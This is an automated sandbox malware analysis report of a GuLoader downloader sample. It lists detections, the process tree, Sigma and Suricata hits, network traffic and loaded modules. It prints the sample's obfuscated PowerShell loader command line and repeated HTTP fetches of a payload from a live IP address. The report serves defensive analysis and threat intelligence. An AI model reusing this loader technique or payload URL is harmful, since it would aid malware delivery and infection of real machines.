Edit tour

Windows Analysis Report
qNNwDeb9BY.exe

Overview

General Information

Sample name:	qNNwDeb9BY.exe renamed because original name is a hash value
Original sample name:	a5e7b9b7461241382bcc88a1fa2b2a6ad712047709de85ffbc58831318eb4d14.exe
Analysis ID:	1633525
MD5:	a0d3de348dd8c0374e58d275a1275359
SHA1:	41ad8293877e331063b01a010edca57948a57910
SHA256:	a5e7b9b7461241382bcc88a1fa2b2a6ad712047709de85ffbc58831318eb4d14
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Early bird code injection technique detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Script Execution From Temp Folder

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

qNNwDeb9BY.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\qNNwDeb9BY.exe" MD5: A0D3DE348DD8C0374E58D275A1275359)

powershell.exe (PID: 6328 cmdline: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 424 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

svchost.exe (PID: 3712 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1437068539.000000000B0FC000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000B.00000002.2117314337.000000000537C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" , CommandLine: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qNNwDeb9BY.exe", ParentImage: C:\Users\user\Desktop\qNNwDeb9BY.exe, ParentProcessId: 6232, ParentProcessName: qNNwDeb9BY.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" , ProcessId: 6328, ProcessName: powershell.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DesusertionIp: 69.55.55.247, DesusertionIsIpv6: false, DesusertionPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 424, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49694

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" , CommandLine: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qNNwDeb9BY.exe", ParentImage: C:\Users\user\Desktop\qNNwDeb9BY.exe, ParentProcessId: 6232, ParentProcessName: qNNwDeb9BY.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)" , ProcessId: 6328, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3712, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T12:54:06.636646+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49694	69.55.55.247	80	TCP
2025-03-10T12:54:28.155196+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49695	69.55.55.247	80	TCP
2025-03-10T12:54:49.686354+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49696	69.55.55.247	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: qNNwDeb9BY.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: qNNwDeb9BY.exe	Virustotal: Detection: 73%			Perma Link
Source: qNNwDeb9BY.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: qNNwDeb9BY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: qNNwDeb9BY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_004065AA FindFirstFileW,FindClose,	0_2_004065AA
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004066F4

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49696 -> 69.55.55.247:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49695 -> 69.55.55.247:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49694 -> 69.55.55.247:80

Source: global traffic	HTTP traffic detected: GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 69.55.55.247Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 69.55.55.247Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 69.55.55.247Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247
Source: unknown	TCP traffic detected without corresponding DNS query: 69.55.55.247

Source: global traffic	HTTP traffic detected: GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 69.55.55.247Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 69.55.55.247Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 69.55.55.247Cache-Control: no-cache

Source: msiexec.exe, 0000000B.00000002.2123450727.000000000842D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2123450727.000000000843D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2123450727.00000000083EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2123395518.00000000083A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin%
Source: msiexec.exe, 0000000B.00000002.2123450727.00000000083EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin=
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.binB
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin_
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000842D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bina
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bink
Source: msiexec.exe, 0000000B.00000002.2123450727.000000000842D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://69.55.55.247/UXSkysDzBMaMrVXGKY103.binv
Source: powershell.exe, 00000001.00000002.1435233565.0000000008D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: svchost.exe, 00000004.00000002.2119475230.0000022FA1E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: svchost.exe, 00000004.00000002.2119475230.0000022FA1E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1203413979.0000022FA2000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: qNNwDeb9BY.exe, 00000000.00000002.889236194.0000000000408000.00000002.00000001.01000000.00000003.sdmp, qNNwDeb9BY.exe, 00000000.00000000.863365711.0000000000408000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1425935127.00000000053C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1435233565.0000000008D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.M
Source: powershell.exe, 00000001.00000002.1435233565.0000000008D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.MSFT_PrinterPort.format.ps1xml
Source: powershell.exe, 00000001.00000002.1425935127.00000000053C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBGr
Source: powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000004.00000003.1203413979.0000022FA2033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000004.00000003.1203413979.0000022FA2000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

Code function: 0_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404B0B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036D7

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_004043F9		0_2_004043F9
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_004070FB		0_2_004070FB

Source: qNNwDeb9BY.exe, 00000000.00000000.863453098.000000000044A000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameantibiotikaforbruget.exe vs qNNwDeb9BY.exe

Source: qNNwDeb9BY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/29@0/2

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

0_2_004036D7

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

Code function: 0_2_00404060 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,

0_2_00404060

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

Code function: 0_2_004023BC CoCreateInstance,

0_2_004023BC

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

File created: C:\Users\user\Documents\packsack.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

File created: C:\Users\user\AppData\Local\Temp\nsb3FFD.tmp

Jump to behavior

Source: qNNwDeb9BY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: qNNwDeb9BY.exe	Virustotal: Detection: 73%
Source: qNNwDeb9BY.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

File read: C:\Users\user\Desktop\qNNwDeb9BY.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\qNNwDeb9BY.exe "C:\Users\user\Desktop\qNNwDeb9BY.exe"
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
